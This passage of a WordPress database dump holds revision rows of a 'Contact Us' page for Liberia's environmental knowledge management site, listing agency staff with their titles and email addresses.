</br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Martin Killen </strong><br />IT Officer<br />NaFAA<br /><a href=\"mailto:maskillen@nafaa.gov.lr\">maskillen@nafaa.gov.lr</a></p><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:34:50','2021-03-23 10:34:50','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3615,42,'2021-03-23 10:34:50','2021-03-23 10:34:50','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-23 10:34:50','2021-03-23 10:34:50','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3616,42,'2021-03-24 11:04:05','2021-03-24 11:04:05','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a 